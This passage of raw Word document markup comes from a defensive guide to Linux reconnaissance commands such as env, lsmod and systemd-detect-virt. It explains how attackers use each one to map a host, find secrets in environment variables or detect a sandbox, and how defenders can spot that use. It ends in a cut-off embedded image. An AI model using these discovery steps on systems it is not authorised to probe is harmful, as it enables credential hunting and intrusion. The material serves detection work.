        <w:t xml:space="preserve">Commonly used to confirm file paths. Alone benign, but abnormal if run repeatedly by a process other than a shell (e.g. a cron job unexpectedly calling it) – could indicate automated scanning of directory structure</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">List files and directories at root.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Maps system’s top-level directories. An attacker may use this to explore available mount points or locate home directories. Defenders can audit unexpected bulk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usage or sequences of file enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows all environment variables for the session.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Environment variables can contain secrets (API keys, paths). An attacker running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">might scan for credentials. Defensively, watch for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outputs from unusual users or processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lsmod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">List currently loaded kernel modules.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In cloud/sandbox discovery, shows virtualization/Hypervisor modules. If an attacker probes for virtual machine or EDR-related modules, it could indicate evasive checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd-detect-virt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Detects virtualization or cloud environment (e.g., AWS, Docker).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reveals if the host is in a cloud provider. In the article’s scenario, running this returned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Amazon”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, showing the machine was an AWS instance</w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[6]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. An attacker uses this to tailor later actions. Defenders should log this command; unusual outputs (or repeated calls) can be flagged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uptime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows how long the system has been running and load average.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers may check stability/performance for crypto-mining suitability. Abnormal frequent checks or scripts running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uptime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">might warrant inspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3557778"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="32" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA+gAAAKbCAIAAADpADdoAAAKMWlDQ1BJQ0MgUHJvZmlsZQAAeJydlndUU9kWh8+9N71QkhCKlNBraFICSA29SJEuKjEJEErAkAAiNkRUcERRkaYIMijggKNDkbEiioUBUbHrBBlE1HFwFBuWSWStGd+8ee/Nm98f935rn73P3Wfvfda6AJD8gwXCTFgJgAyhWBTh58WIjYtnYAcBDPAAA2wA4HCzs0IW+EYCmQJ82IxsmRP4F726DiD5+yrTP4zBAP+flLlZIjEAUJiM5/L42VwZF8k4PVecJbdPyZi2NE3OMErOIlmCMlaTc/IsW3z2mWUPOfMyhDwZy3PO4mXw5Nwn4405Er6MkWAZF+cI+LkyviZjg3RJhkDGb+SxGXxONgAoktwu5nNTZGwtY5IoMoIt43kA4EjJX/DSL1jMzxPLD8XOzFouEiSniBkmXFOGjZMTi+HPz03ni8XMMA43jSPiMdiZGVkc4XIAZs/8WRR5bRmyIjvYODk4MG0tbb4o1H9d/JuS93aWXoR/7hlEH/jD9ld+mQ0AsKZltdn6h21pFQBd6wFQu/2HzWAvAIqyvnUOfXEeunxeUsTiLGcrq9zcXEsBn2spL+jv+p8Of0NffM9Svt3v5WF485M4knQxQ143bmZ6pkTEyM7icPkM5p+H+B8H/nUeFhH8JL6IL5RFRMumTCBMlrVbyBOIBZlChkD4n5r4D8P+pNm5lona+BHQllgCpSEaQH4eACgqESAJe2Qr0O99C8ZHA/nNi9GZmJ37z4L+fVe4TP7IFiR/jmNHRDK4ElHO7Jr8WgI0IABFQAPqQBvoAxPABLbAEbgAD+ADAkEoiARxYDHgghSQAUQgFxSAtaAYlIKtYCeoBnWgETSDNnAYdIFj4DQ4By6By2AE3AFSMA6egCnwCsxAEISFyBAVUod0IEPIHLKFWJAb5AMFQxFQHJQIJUNCSAIVQOugUqgcqobqoWboW+godBq6AA1Dt6BRaBL6FXoHIzAJpsFasBFsBbNgTzgIjoQXwcnwMjgfLoK3wJVwA3wQ7oRPw5fgEVgKP4GnEYAQETqiizARFsJGQpF4JAkRIauQEqQCaUDakB6kH7mKSJGnyFsUBkVFMVBMlAvKHxWF4qKWoVahNqOqUQdQnag+1FXUKGoK9RFNRmuizdHO6AB0LDoZnYsuRlegm9Ad6LPoEfQ4+hUGg6FjjDGOGH9MHCYVswKzGbMb0445hRnGjGGmsVisOtYc64oNxXKwYmwxtgp7EHsSewU7jn2DI+J0cLY4X1w8TogrxFXgWnAncFdwE7gZvBLeEO+MD8Xz8MvxZfhGfA9+CD+OnyEoE4wJroRIQiphLaGS0EY4S7hLeEEkEvWITsRwooC4hlhJPEQ8TxwlviVRSGYkNimBJCFtIe0nnSLdIr0gk8lGZA9yPFlM3kJuJp8h3ye/UaAqWCoEKPAUVivUKHQqXFF4pohXNFT0VFysmK9YoXhEcUjxqRJeyUiJrcRRWqVUo3RU6YbStDJV2UY5VDlDebNyi/IF5UcULMWI4kPhUYoo+yhnKGNUhKpPZVO51HXURupZ6jgNQzOmBdBSaaW0b2iDtCkVioqdSrRKnkqNynEVKR2hG9ED6On0Mvph+nX6O1UtVU9Vvuom1TbVK6qv1eaoeajx1UrU2tVG1N6pM9R91NPUt6l3qd/TQGmYaYRr5Grs0Tir8XQObY7LHO6ckjmH59zWhDXNNCM0V2ju0xzQnNbS1vLTytKq0jqj9VSbru2hnaq9Q/uE9qQOVcdNR6CzQ+ekzmOGCsOTkc6oZPQxpnQ1df11Jbr1uoO6M3rGelF6hXrtevf0Cfos/ST9Hfq9+lMGOgYhBgUGrQa3DfGGLMMUw12G/YavjYyNYow2GHUZPTJWMw4wzjduNb5rQjZxN1lm0mByzRRjyjJNM91tetkMNrM3SzGrMRsyh80dzAXmu82HLdAWThZCiwaLG0wS05OZw2xljlrSLYMtCy27LJ9ZGVjFW22z6rf6aG1vnW7daH3HhmITaFNo02Pzq62ZLde2xvbaXPJc37mr53bPfW5nbse322N3055qH2K/wb7X/oODo4PIoc1h0tHAMdGx1vEGi8YKY21mnXdCO3k5rXY65vTW2cFZ7HzY+RcXpkuaS4vLo3nG8/jzGueNueq5clzrXaVuDLdEt71uUnddd457g/sDD30PnkeTx4SnqWeq50HPZ17WXiKvDq/XbGf2SvYpb8Tbz7vEe9CH4hPlU+1z31fPN9m31XfKz95vhd8pf7R/kP82/xsBWgHcgOaAqUDHwJWBfUGkoAVB1UEPgs2CRcE9IXBIYMj2kLvzDecL53eFgtCA0O2h98KMw5aFfR+OCQ8Lrwl/GGETURDRv4C6YMmClgWvIr0iyyLvRJlESaJ6oxWjE6Kbo1/HeMeUx0hjrWJXxl6K04gTxHXHY+Oj45vipxf6LNy5cDzBPqE44foi40V5iy4s1licvvj4EsUlnCVHEtGJMYktie85oZwGzvTSgKW1S6e4bO4u7hOeB28Hb5Lvyi/nTyS5JpUnPUp2Td6ePJninlKR8lTAFlQLnqf6p9alvk4LTduf9ik9Jr09A5eRmHFUSBGmCfsytTPzMoezzLOKs6TLnJftXDYlChI1ZUPZi7K7xTTZz9SAxESyXjKa45ZTk/MmNzr3SJ5ynjBvYLnZ8k3LJ/J9879egVrBXdFboFuwtmB0pefK+lXQqqWrelfrry5aPb7Gb82BtYS1aWt/KLQuLC98uS5mXU+RVtGaorH1futbixWKRcU3NrhsqNuI2ijYOLhp7qaqTR9LeCUXS61LK0rfb+ZuvviVzVeVX33akrRlsMyhbM9WzFbh1uvb3LcdKFcuzy8f2x6yvXMHY0fJjpc7l+y8UGFXUbeLsEuyS1oZXNldZVC1tep9dUr1SI1XTXutZu2m2te7ebuv7PHY01anVVda926vYO/Ner/6zgajhop9mH05+x42Rjf2f836urlJo6m06cN+4X7pgYgDfc2Ozc0tmi1lrXCrpHXyYMLBy994f9Pdxmyrb6e3lx4ChySHHn+b+O31w0GHe4+wjrR9Z/hdbQe1o6QT6lzeOdWV0iXtjusePhp4tLfHpafje8vv9x/TPVZzXOV42QnCiaITn07mn5w+lXXq6enk02O9S3rvnIk9c60vvG/wbNDZ8+d8z53p9+w/ed71/LELzheOXmRd7LrkcKlzwH6g4wf7HzoGHQY7hxyHui87Xe4Znjd84or7ldNXva+euxZw7dLI/JHh61HXb95IuCG9ybv56Fb6ree3c27P3FlzF3235J7SvYr7mvcbfjT9sV3qID0+6j068GDBgztj3LEnP2X/9H686CH5YcWEzkTzI9tHxyZ9Jy8/Xvh4/EnWk5mnxT8r/1z7zOTZd794/DIwFTs1/lz0/NOvm1+ov9j/0u5l73TY9P1XGa9mXpe8UX9z4C3rbf+7mHcTM7nvse8rP5h+6PkY9PHup4xPn34D94Tz+6TMXDkAAQAASURBVHicfP1pk21Zkh2GreV7n3NvRLwh8+VQWfPYNTSqGz2jATTRAARAkAiYRFJGoyDSTH9Av0A/QT9BZvpCGkwTZCBBgYQEgmwKQw/oBhpd1d3VNWVWVc6Zb4gXw73nbPelD77PjRM3XvFa1cuIG/ees88e3Je7L3dnqSOWF0lJWL1I5g8Rsf61v0kHRTMJJPr/BREmSAHBRBAhkQRCEkkzc3ej0ShaM7ICFiBIgkAxkYzI4RCQBIeM2FBVqEQlCjAQBagEghWyAAkZAmhCsP/QCAgDsSEeGk4CNTAGWTQHg6JgAAIgZrJQEnO4RdhAZ+JZwyidFzwfsAuMBaPjbMbDwH1hA+zBj4ouC7bEGXDmKIEwXBDngd2AZpgDTlyBz4kPgI+jPBOcvDXxkGRmh+UQgiBJWUFlnMi3xAmxEYqjGkIMqonPZRfQDJE6AUZgFKpYKRoq+arhtVlngRmYiAZcF4ig8ER4XHDdMBAVDAgBLzACARKT7ALlimguQMjhGQjAKVCUgWEMgSALCUmHBznsMRogCkGKFMB86qNtdvSO+kYSkF8xh8VosQmdCFtDEUZiMObs7Wa7MjyXOWJgbIAT4GXgCw1fmPEgMAB74CPDDzd4q6IRnwx+ZdbZHgPQyNn0BDgf+ErwS3NshAm4BAfoZbJIDuyA64Lv38e3HCeOX9zhkwEDroAPKv9oW7+DcgFI+fi5uAAgB+EiQWw1v2L6gvAKsKEU2Aemgh3xlDinPVW5BDxoiDO2rwp/fuIbTQMZwtVW71S8LXwknLOeF3vu1iQQCpIkIyI3VUR/J+ez/wCBFhAISoSJpChADEgFjNVy5L8pGY7ePKxX3jTf8OK+ob9e8CnGQ3BbQOeV4cdt/KEPVyGWaYvpl8S/e403An+81X871jdVnGVC8ZDkJ9r91dD/Yo8K/G6p/812+wGMuREZkpvtvxL4j6/1M45/N9j/cMKP63hFPZ2GiX6i3Rcsvj7bZ671WeG64B+dbP+w1uaNUVSD7tIgigBoEmgpFSCBtDtCcrUtAQgw0IhwGSkqQjxs+9Unb34+2vD5q7EvU36glWgPGJ+psuIXu+E/29qPiP/L+agyu9rf2vB/v/V/sC//aN5OBYagQ5b3LaUcncFA1BbXXz3h//Eb/Gc/0D98Wss2dm5zSMS4m39lxM+8HO/M+O7F5t1S9k2yw9gO22Z9SBdJJaeK0LZEa9ZKkcmU2+qw2Q5fMeak3bqOGEhFAKAwjGXG7jT8l075tZPYXetR4dk9/H+fnvz+RYTt/trG/meP9H/9YPtHXkvJYSji6tPC33oUe4z/5NnwJIpw+aUh/tIZCL3r9AEf7Or3r+MB46/ex16bf3axeY4gGRV0KcAcISWYKIg00gCFWiCMtlq7ZQOIWD4MBkp/rvm+7V4ftS3D03nz7sSZYkPF7o1N++QGUH13v/lgVuXujU08KHDhyR7VsB1s59snMZ9ae6nKUJ82O3d/aeBQrLXN42bXoaD1MUCSQJIgJYcIILdEHtvDD6VCCgKwlOQEFGGqwNbmUV5pQ5EiAI0m0UIqFEPNWQsBEapm115miWYCpDAyAmCZwy7cGgWYUQYZYcYIOGNuhaRAxrIXcJBOIEULkpZqWoHGUmAGqZg54IYiKIRS4I4muhWXQiiESSOjmknhKnugCXBQJkPKSBE0dKW2ABUNihwCpDgoo75RTUq1CPTpXY28gAaKpjuY6uidW8fnoBpufUW4LTdSZixfJGmxusjN1N0oUGElf8xsjejWcmb9jLevQHQ0RkHtRkwR0dWxdWmPo6sdRuXuAA4PyNufx23xePQ4a/G1fjN/yCda49WDqFlfPyLW79yCWNJ6bOsDslZnL1y1o+VLDVtKyafLd9by/3CvwwcOavSFV+7fTSANAKh352u9Wkdzd6R+yIoCGQAEwS6DBcgFhBEWAUp0SR3e3dyOAEDJGuSCJfzveoXGhPGhfpQA0AySBiQiZ6WaUIAiVKil6CFcCECACw54/zryCF4LBDYEi0BG0ZTSVoigmebAxgAKqX8rRNSmSszgvuJK2hudcmIYMTfMMwrQKCdkALkPOVErQTlAwIlLB4DJeE09D1yqzijiMrqbjZ6LvbzDYgMSOQjywNzVSbgwFuzVbZUpuJOCMKASp4YToDgqVIDRMBIPpPvOlwQHZ2pP7ByzwaFroHo3hAbJCC+YBQkFMLIBEX17GKE0tEwRxgpAlEEAabmFBLwA6Kz31WFPrQXK+gN39+dylhghIzjJWsQsXQMGmGDBYuHiTOybNaLAikUIQczAJfmsyIURuCbeMz6taEUtcC58BDhwuhgI94SHE15CFGAHzECDCDSp5PkBQmySBA+CIBWCQKMKA07gYJvdyKnUPWQQ8xn1qcBnAg+kwr51I3ANnBSclGDQg3tGZTwQ3nC85ngJoHRV+NTwrvCk4EqcxLnBlTteeLEAOkJRoqXuEoTKyMMcYYIJaZ4d5NYadK7R/9H65k07CHbyWnxH7ZnbaWEBBLuehudRZjSjCXWP9q7pxyM2e7w849flnyr+4Vh+rM0ToJX9G85vmh4Qb4Pf29RzQn3HdE0mgIVjAR0XxX6M+rgVSR7Ogj2Hn2CeBrUJf95RgEf5GGUA5qFNXyo4RbyJeq4agiBYYTS4WTEtT3T78W/vW7FL2KCY07yetCPse6S2b/7FLVUtj/qYeDzRGLTpv9hxrgU1IBj0x5P9+KT8xib+ZL97CkzcPqsKYaU2DmOOCBDhFgMKLjA324Pz3lhNdM7jX9mWv7WdLre8V+svbuZ/8jH/Xa2hBq0H/EKjOh/p+uWp/Puv6rfP658Jlntr9Sy3gf5aUUuiLTOm/j9KAdtcqv3+9fzBxE+NuIIePxvf2lWV/QPqgWk/c25InERIrkp85kQPRv7b83LRamyCDQaeDPGTK35np5dObDvobA5zgTwr8ysWNco16i5Nt4JQ4nASIKgEtQ0p69il9AIUTCpQTkXOVSBlDkBjmVCfNmxUnrvNMhKwMKISW4NBJ0XWEIQjbTfKJJMZTeENwQ5PSSEMCKKNxU41VOMs7lP75mhlZNqbIdye6cPWZe5Y5tSlEhYIIRRzGEp4wEmpUM2EQnWBQBTDWDRLad0WIkiaZk/DAYO5EYXcpSaXDCKsmAgJBlmaGoQAYw78ZsemyQwFYDQiYGkJSQBc0c3pkCIIIGQkBHfPRUnELylIDfRQAc1NCPFmLy4bFN2BmCNiR+ZHR9XMhAAsLQ3dloTowOUWUFufmqPX4WMvVHOSeHTc+rC7x1QvusL6srg9gMSvXFw5B8P+4NnB6nFWRxV9JLyZjUjBm3AeoN1M6Auh6pH0OLwOUHv14LdeR+8czdWRVHkhiMWCy18owe7aDEdQ/u7Fj2wJrDZJfuvuJ+9e/6c96Vpu958BEAEUsN690N25WF/61i40okB0FKKwi4X0QERAEEQHAzCDiyvfD3OhD4hNgEMdmaJLeesbljdOd0WALjShSCURKlCBknZxgB1IITWpk94fF2Yi0AyXE1J+NAcLGihiCrhBRKlyoRjMEEQIIRhhFZSuDTsgpMlRhL3hihwNkPaADA7uoQaMRLppImAAgaHAhUY1otGasQVFWAfEL1zaPGvox4ZwcQdDkZxuShApwFVnw3UEFCNwBpwJpxmUIESMwKn0MPAgdOIA1IgtsDXsjJfkUJUGSyVODAMhYu9wwYjWByTBzEIqWFyKuUB90RZ/uBl02yO7sk8UK6F8Z9fip0giABFhVpaNGYBTRhevoX3CgDBLEwIIMAM5PXLAKMS+4BkwNLssKoG96anpQpwCQTyreI8wwJ1FQqAAG0jiFTVnjAKspuJ4wNyxDMIDAIql3ks9oBAFgmuHx836BgpNphjIRxaf2eHVhlOhErNxMs3CGBgCGwDms3gtbQs+QX4W+KS0FQRcAe8JPyq4irIH96q77phZJjyOZNn61xSXqe5h8K21h0YL7mDXwHWUKF2f316mu/JhLfoP65h71wTS6j7qBD1rBocgAyOxBQgVlfHd2P3+SFU92OHVyV4a9EPq+Tg/j9gq/jzsS3vOwJtn5Qd12LclmgeFOmgzaBAMaICjNMFCQEQbMJQL2DX3pzUaeeYYpQhJJvpQ4vMof2Fq34r6T0/smc21tXvBFuUaDEk0MLp6xoIrVvtWirSTYEwAxdq9nyu1cSRR12+u1P8tOWBRhAagqBao/JmJe1oRabLN+zH//XP+p6/yf3evzAV/atM/fDLGqMX5ipUvoF+Twqhi+9aioMgAyRVxige/+dKHl9fzP3ifzyb+rVfqv/9w+sljfWBmdlcXrNW8JANLAD834K8gvlf9z3a0YoH1J9efJ/qEkcz5iYj0ZHO1fwgvKMPzwHf2+L5K9XCURhn1uU358qk20GuVbzn2uUCY7xV9atD5XH84j1Olwcj6xOfnUV49jborbz5nKbaTPwwW4LUa3zzxa5XH4X92vbkqEkQJIro7FkgvS+qvW9DEzLqnAqIp5ynCebDcpLKzEw8UYpIJ/TEF2wefN20KWTFMJrEIBaKpCiM5EnsQkDu8MN25ha7wgbg3TEV+HcNO4TPMOrhyi1A6k9nNbuZxvI0L46DWu75BQKCDYAmRCHOjKc9ZhSgZZeBQYAYLNMFdQGRoZnYaA1I1VUrCQEkwc8KKhaAIUlJYSseM7qHj5hu8kruXlAeCVkwsaqIpmIomDJbeKnkIRIAhLuEDQEGqFCBUUmCHLD16ZJ7oFx3MVHfdn60bLLXA+hRaEm9sojVKkwSWI3SI1evmFBwFP28F4gTJih0uHvKb5VMPN3IRGceCo3sOLL99OGLrD9+FvOs3b0E+EsaIJc5wkFdIf3CGJ7BW9EeX/Wlq6ICP7+r99XweHvPIwbf+0wtR8uEuRyHiAzg+0mK4I9+OrrBer/UYbs/9rVk9KMejlToa0npUBz9RFzLdua169IWju66/c/MmQLMgVIACFEMBCnvEOn18YR2pZLjKYRMYFgHCJEfH7QkuKKUeVAFFKWF9JJUC0Q1yCqKTAl2qlIWMnAEjqeiOAhmoBJMSu+ELDIZ9wAomYaBNDAFuOTzNwt6ggAU3VQCaQCFHOhvCGCE6L4GdACqd0BWaqCsggDC4EYGpoILV5A3FoAI5LFAqghgAEmGaXQ6xkxkOU71ejsXYugmWJQxNkMoQ524dqInp7y+BLXGPOBNOhTElmDgI9wruQ6eOAajAPmC5bKFrICwnDxQG4BQwx30gyIk6p+RA+toNUIfoSkyufoCD/a3c00T6pdTXGP35KCKPByKOBcrh9B6dWywqB9Bit1Fg94tFXrzCA4hOPyKBEMxmKAAgCLh0bdqKQ0UDdgU7yIkZvBRlKoZZGiNd5mjEFEpKjxc8RfcwDUpGDTzggohiqkBRN40JtKC0BNxvIVpmZEjyQXpZfE16GNgCBJ4Bz40OPQC2jjPSRqnq4wDILTQ6ToQTcA8NrrPACXEZmFT3RbOjq+pYC5SDTDwaCZCny2D0T0KfgfbgM+IJ0RLUi9E/lQE26ZbQyIukZX50LzsIE1Ldh4qAMgTelT0IwuHjteJbmC8Nnz7Fq+Fj8KIyGFT7LPlNjzPnT0747VofTwrwoEi0iIiNo8ZyIwGkzNK3IG8CJmMTSoMVADJFc3EoO/en0KcaX8X0nabLuv9Z4deoD6z+9jB8OLeRXlRns0AwEJAs1GBEEBANBRDicFS1qNWjubpBumbpADsglf6n22ZSgWQVkVHzUPog4ICRIXLzx7r6P3/Eb1R98X672G1yY+F4lfvPEBHcOLnnXpAoePJL3jB/APwrDn841bDpv3+q/8P98VdL/DdOHi/usrVyoRFQgPuXhF+7p4vB3porKuJwZm8eZzUSQ3e23swMgjDm4gWCidsoVQ5hmsWJBZQBEeW9efq3V/jiiX3l1fbe880PJ4sAi16veHWDH1wNH3ioQC7GcG7Tty7w8/fxCw/5b8759gynjSVGYiedO05LfGkb116+O9lQ/KwIsqsY9wmVAoyDPQxAieMPxio9pZzCSJKWXtF+FkLcA/DOnwJCgmM8j+qTb6zOLCizZhk4QEY8GiEAER6SrFYUyRQRLAoT7hkf1ZBjdg7kqQFELYDZLup12AyBKXyFHgxNIa8k/izYnaQUEpCMG4BizIJUqwEKUyXB8CIFfbQYou/wYjRiDoqIMA+xgJJJZiqIwag8JJQRRoU0tQKQJqT5jgzvdYUSsfJ3dl0DT20Glh4eVIEkFAOYyJxBQMjTBKAYKRF5OdF9YBSYi4ndnVCkRiPTc5guw+CNh/EOIuwzmmbSIuIgAylxmcMbAXvbJ7U2A/K15o0oNWU65VZOaJLspLWCxSxfY9D1HcUO69NaW9+dpCLswLHplt2Lde4Ka0Khg/MCWFjQEUb64msljz0Ua4rmkfQ40k1rEbF+NK5eR+D+8MVYbZjDnB8puyNcsZZFhz+th3RrRX4KaXw9t+ur/U/c67BeB9/8evnWVzjsDYVsQVAVK3PneF/esSFWl5QG4sA1ryvgnmq5O74WpooRQDjZoCazhFQd8RksIJhFRp/QpQkELN52dJwoknSHG5qBsjzm7EY5ipFpQJOiCZKiUAaKcmDvaXloAuYAAAemwB6YCRMGKBoaYQYFkuBgAqgmRNEEeJJtKiapBkZDLQgBhtbgBdUwCGiwhOnC5cEqD4icXW55ClNrHqnY9SFf1qU7JvsKBDgTHijJRwEbg5AJA3FiOCFOAklzFzEAm6IT4SSwyfiDUACHTDBiSwzpKjYQGAL3wBEoRIPOA5cl9xcEFQStZzBIDCBgQnqd2VcrmYP9IXLUPba2HK5c2/Uh1G1Hy9GeXqalG4hdg0KFXG57AOvMA5FXDgWa6DQ3XksZpRktVQgrEeAU2Af21EyGaQLuVVXHaNxLpYEAyX3hRyWZm6ozt9Je2BVd5+NHwlIEYZllkS7D7k86PGAOs0/HAJ4xNsEBKij7Ej+p+i5xZvzz1MszJyGAXcV1wU4o5EBVYIQC3AIvFzw0XSH2oeskpxwLrPV8HnYXFluIBhT5y9I3yU/u8Zz4cONUDPBiZWflWXBi+qokHFx361vcFcc3t1C6L/v/AZRUjjeBaUIKluFa+DNv7xofVY1uV9LjFiXwtYbPzJxM3y32A7dpZfRCNGPmZeSmFTALjuCyIZnpN3IEhsKBsMO2hODFje8w3iK+Efo69zvx77h+6dr++Ua/y0mYv276Oc1/2LZ/Woob6CFnGMFIZdqlURrXZgtjDHcUyZEoP3bmcXFbHebWChTdPBZJhcwRpbMPClBPvu/xvVnD44GFsRFjZTPf0nCkiVFONJp70uED1dgge33TiHg8FcCGWn68t2eTfn7APw0LS5YqbqsiSZmEU2gu6Wc2/Oo9/yfnpx8ErK710frxb6iuCQhWc1KsqqPLWDmEFg/iYYNJQKmPuf3n1/77V3q0HXaEBZzzqcc3Roxmb+/HPZ0qAdE0a/P9abp+xq/ei28+VL0Y3rxSUlMeN/v+ZTys+LlHeONkentvW8Znz+JEfD772/vTZ5Bb4pKmpIiCpQu51YRwcb2DOLDGc0EX15qt3aIsV257jaX71LkhClUNW4MFdtQu6iwY3YBiYPfqq5KnRQMxEGZy12g+ILaFVsqV04CdlBHjORhiGAnvhgOJ4A17udPasDYsQRH0SHytfbLhiRYlME/BsbgBJA3yJNAApUS/LAGgFB9U3diCRpA0E8OGSkU0UAWR